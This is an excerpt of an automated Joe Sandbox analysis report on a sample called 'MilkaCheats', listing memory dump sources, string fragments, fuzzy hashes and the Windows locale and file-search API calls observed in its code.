                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ($+$-$/$0$1$2$3$4$8$8$9$9$;$<$=$>$?$?$@$A$B$C$E$G$H$I$K$M$O$Q$S$S$U$W$Y$[$\$]$_$a$c$e$g$i$k$m$o$q$s$u$w$x$y${$|$|$}
                                                                                              • API String ID: 0-901420310
                                                                                              • Opcode ID: 9ff95fa98a9c8fa0834cb8fa355381c427a5d401ca1c5a4a17797ec6589dbca1
                                                                                              • Instruction ID: b5da1afea6ee4abb37875f2c75b8de69be8e98d241b9df737dd44b98ed3b5671
                                                                                              • Opcode Fuzzy Hash: 9ff95fa98a9c8fa0834cb8fa355381c427a5d401ca1c5a4a17797ec6589dbca1
                                                                                              • Instruction Fuzzy Hash: A42250219087E98DDB32C67C8C087DDBEA15B67324F0843D9D1E96B2D2C7B50B85CB66
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$#$$$%$'$)$+$-$/$0$1$3$4$5$7$9$;$<$=$>$?$@$A$E$E$G$H$M$X$Y$[$h$r$s$t
                                                                                              • API String ID: 0-3672740722
                                                                                              • Opcode ID: 4ae2ef22dd5cd9d85fad40d90f2d2a0374cb7241c5e71f4f93d0151e211f1b03
                                                                                              • Instruction ID: 47ff10d35f9d31662f33744cf0156f3960a6821bd779658f5aecadf2a28918c5
                                                                                              • Opcode Fuzzy Hash: 4ae2ef22dd5cd9d85fad40d90f2d2a0374cb7241c5e71f4f93d0151e211f1b03
                                                                                              • Instruction Fuzzy Hash: EEE19221D087E98EDB26CA7C880839DBFB16B52314F1842DDD4E9AB3C3D7754A45CB62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: G"A$&+$*$/E;C$/$$2A"_$@C$O\$SX$_Y$h#j=$i'd!$lF$m9O7$pq$r3$31
                                                                                              • API String ID: 0-2321160229
                                                                                              • Opcode ID: b8f049ba8096286ec80d62931fdf588bc9f44c0889362310616f571f3e6783b2
                                                                                              • Instruction ID: 3ba6480c4f637bd6eefa8aecf51e9ba813b53f619b261f7a1cd397dcae0303f3
                                                                                              • Opcode Fuzzy Hash: b8f049ba8096286ec80d62931fdf588bc9f44c0889362310616f571f3e6783b2
                                                                                              • Instruction Fuzzy Hash: A842D8B414D3858AE374CF169581BCFBAE1BB92304F208E2DC2E95B255DB74814ACF93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                                              • API String ID: 0-600622405
                                                                                              • Opcode ID: 5401dd7d73687538b39f8a60e941c4ee8bd7b6e3a78600276bbf727d0c8ab92a
                                                                                              • Instruction ID: 00ec5d62ddf2ce750e35bcf0f535e0ae5a195159dd2f938a76e4c1588e35c41c
                                                                                              • Opcode Fuzzy Hash: 5401dd7d73687538b39f8a60e941c4ee8bd7b6e3a78600276bbf727d0c8ab92a
                                                                                              • Instruction Fuzzy Hash: 92D1247160C3958BC320CF24D4903AFBBE2ABD2704F18892EE5D54B751D775D90AEB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &?3$,/.1$3210$4761$8;:5$8?$L$RdOh$X[Z]$dgfi$h$mdOh$w`k
                                                                                              • API String ID: 0-3944949542
                                                                                              • Opcode ID: 27a7076405f7ae26ad8b1691d0a2ed41cf52535f449cd577730d3fbcc9e02e51
                                                                                              • Instruction ID: f40a927ca9f87adfeab739f33eb40bee4736c4fb55e5707dbbffaee027026a89
                                                                                              • Opcode Fuzzy Hash: 27a7076405f7ae26ad8b1691d0a2ed41cf52535f449cd577730d3fbcc9e02e51
                                                                                              • Instruction Fuzzy Hash: 6DB2D07160C3818BD734CF25C4917ABBBE2AFD6304F188D6DE4C98B292D7B58905CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                              • API String ID: 0-3385986306
                                                                                              • Opcode ID: 86df71254f412a11028d550705ac35df7369e2e6aca90a7abbc0bff00b8b010c
                                                                                              • Instruction ID: c541a0be6efafc79654246c2e0d0d5062919f6a888884b5743c5197600410779
                                                                                              • Opcode Fuzzy Hash: 86df71254f412a11028d550705ac35df7369e2e6aca90a7abbc0bff00b8b010c
                                                                                              • Instruction Fuzzy Hash: F382F275A0D3858FD718CF28C49036ABBE1AB85304F18CA6DE6DA87792D374DD05DB82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Y^S$Y^S$#g>#$#g>#$$*- $$*- $UjcW$UjcW$YRTP$o$ $o$
                                                                                              • API String ID: 0-2828925941
                                                                                              • Opcode ID: e80b0cc4059dca3e0b6f5f179f323d24d1a659c15c83aa546cd6fdcad424a146
                                                                                              • Instruction ID: 3abf93f93d61eb77426b10fca0249c3b5e0da36510406cf68925d428b0ece3a0
                                                                                              • Opcode Fuzzy Hash: e80b0cc4059dca3e0b6f5f179f323d24d1a659c15c83aa546cd6fdcad424a146
                                                                                              • Instruction Fuzzy Hash: CC81BF3164C3858BD7388FA484913EBBBF1AF96340F14996DD4DA8B382D7309949DB62
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,,00000002,00000000,?,?,?,000DE5EE,?,00000000), ref: 000DE369
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,,00000002,00000000,?,?,?,000DE5EE,?,00000000), ref: 000DE392
                                                                                              • GetACP.KERNEL32(?,?,000DE5EE,?,00000000), ref: 000DE3A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP$
                                                                                              • API String ID: 2299586839-755115278
                                                                                              • Opcode ID: 17cdbac1c65c1084c85c7fb3862f2bf14850628126215e89a250d061943e434e
                                                                                              • Instruction ID: a313f572fcde340f5b5853a2211364eb5c24712f214846039d5b2382732b54c3
                                                                                              • Opcode Fuzzy Hash: 17cdbac1c65c1084c85c7fb3862f2bf14850628126215e89a250d061943e434e
                                                                                              • Instruction Fuzzy Hash: E021B822A00380EBDB74AF55C949ABB73E6AB50B54B5A4426E94ADF300E732DF40D370
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ $ $ $ $ $
                                                                                              • API String ID: 0-935225467
                                                                                              • Opcode ID: b254aa17cc46d80bf86c8579fc0bf1715e3884e9fc4ec05af717202ccc13fb02
                                                                                              • Instruction ID: cf78bafc5f4fd8ff70626d320a1130145519996e21a26f2f62589d437de8e155
                                                                                              • Opcode Fuzzy Hash: b254aa17cc46d80bf86c8579fc0bf1715e3884e9fc4ec05af717202ccc13fb02
                                                                                              • Instruction Fuzzy Hash: 58A22431608386CFC728CF28C4942BABBE2AFD5354F18862DE5958BB91E735DC45DB81
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: d312b11b7a29281cb47d62251e1854f02f27d653fa6dafc5e08d9f0bd033e3b0
                                                                                              • Instruction ID: ad21ff2f7c26683374adfea19baeae78cda5418de487442abb5a9b375bffc063
                                                                                              • Opcode Fuzzy Hash: d312b11b7a29281cb47d62251e1854f02f27d653fa6dafc5e08d9f0bd033e3b0
                                                                                              • Instruction Fuzzy Hash: FCD21971E086698FDB65CF28DD40BEAB7B5EB44304F1441EAD84EE7240DB74AE818F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @ffI$itkj$q`h}$xy$yleh$uw
                                                                                              • API String ID: 0-3689917334
                                                                                              • Opcode ID: e20f88a561601b5f4ca72019cf5c033d39b5832eb0a3cf68ba31b152de778407
                                                                                              • Instruction ID: 5c5cc598524f123f5cfc10db71aa3fd6d32e6fb8d190ed283f7568aab79fa164
                                                                                              • Opcode Fuzzy Hash: e20f88a561601b5f4ca72019cf5c033d39b5832eb0a3cf68ba31b152de778407
                                                                                              • Instruction Fuzzy Hash: F7C1F1B02083889FE314DF65D88176FBBE4EBD2348F14892CE1D58B392D7798509CB96
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 000DE5B1
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 000DE5FA
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 000DE609
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 000DE651
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 000DE670
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                              • String ID:
                                                                                              • API String ID: 415426439-0
                                                                                              • Opcode ID: 8b54e9aa391688c713403713be65fadef7e64e73dd09b10a55c29f52956bb76f
                                                                                              • Instruction ID: 7f60f70140d62dd80280ef4def0c485419fb0faeac91b6381aa6d5c53ec747b2
                                                                                              • Opcode Fuzzy Hash: 8b54e9aa391688c713403713be65fadef7e64e73dd09b10a55c29f52956bb76f
                                                                                              • Instruction Fuzzy Hash: E0518F71A00745ABEB50EFA5EC81ABE77F8AF04744F18446AE910EF295EB70D9408B71
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,000D22E5,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000DDC02
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,000D22E5,?,?,?,00000055,?,-00000050,?,?), ref: 000DDC2D
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 000DDD90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                              • String ID: utf8
                                                                                              • API String ID: 607553120-905460609
                                                                                              • Opcode ID: 14f0393ada8af5ab1f540883df9a20f0159d1b152dcbeec3cafda01dd7f5e0a0
                                                                                              • Instruction ID: 06b86b03346fafcaa6d0867307113521f5948e8027fe27f881f017e0d3d6b8a9
                                                                                              • Opcode Fuzzy Hash: 14f0393ada8af5ab1f540883df9a20f0159d1b152dcbeec3cafda01dd7f5e0a0
                                                                                              • Instruction Fuzzy Hash: D371D371A04306AADB24AB75CC46BBA77E9EF44714F14446BF505DB382EBB0E940C774
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "#<$8977$InA>$InA>$f
                                                                                              • API String ID: 0-3216925240
                                                                                              • Opcode ID: 4390526fb2d9361e3e861b090892f1eaa3d55a8709e4123d052abd61ee78d48e
                                                                                              • Instruction ID: 83f6f897595d3db07a1e416046051c59fdc96e2492095f2faaa22e0faf8790a9
                                                                                              • Opcode Fuzzy Hash: 4390526fb2d9361e3e861b090892f1eaa3d55a8709e4123d052abd61ee78d48e
                                                                                              • Instruction Fuzzy Hash: E522B1756083519FC718CF29E890A2BBBE2BFC9314F298A2DF89587391D734D855CB42
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $7$7$8$W
                                                                                              • API String ID: 0-4210289531
                                                                                              • Opcode ID: b84917e3046d0e9ff34ea9dff3210f059944da5bea755bfecf8ed8586c0b4526
                                                                                              • Instruction ID: 37e1f35e59c946589e3f8a617d325cb3eefb805ec8a87b0b81449efb60961ddb
                                                                                              • Opcode Fuzzy Hash: b84917e3046d0e9ff34ea9dff3210f059944da5bea755bfecf8ed8586c0b4526
                                                                                              • Instruction Fuzzy Hash: 9081C57260C7808BD328CA3DC85539BBBD2ABD5328F1D8A2DE5E5873D2D7788845C742
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 3213747228-0
                                                                                              • Opcode ID: 377daaca5f40ff0bab8c76c66dec3116f3cd0f311fe1383518dd9434e06cd4a3
                                                                                              • Instruction ID: 3eaedc38190d0fdc2f9bbedb7d08626f8941205fb8e7e3627f47a0380c302d83
                                                                                              • Opcode Fuzzy Hash: 377daaca5f40ff0bab8c76c66dec3116f3cd0f311fe1383518dd9434e06cd4a3
                                                                                              • Instruction Fuzzy Hash: 44B10272A003459FEB258F68C891BFEBBE5EF55314F18816BE845AB342DA349D01C7B1
                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 000DB329
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 000DB41D
                                                                                              • FindClose.KERNEL32(00000000), ref: 000DB45C
                                                                                              • FindClose.KERNEL32(00000000), ref: 000DB48F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
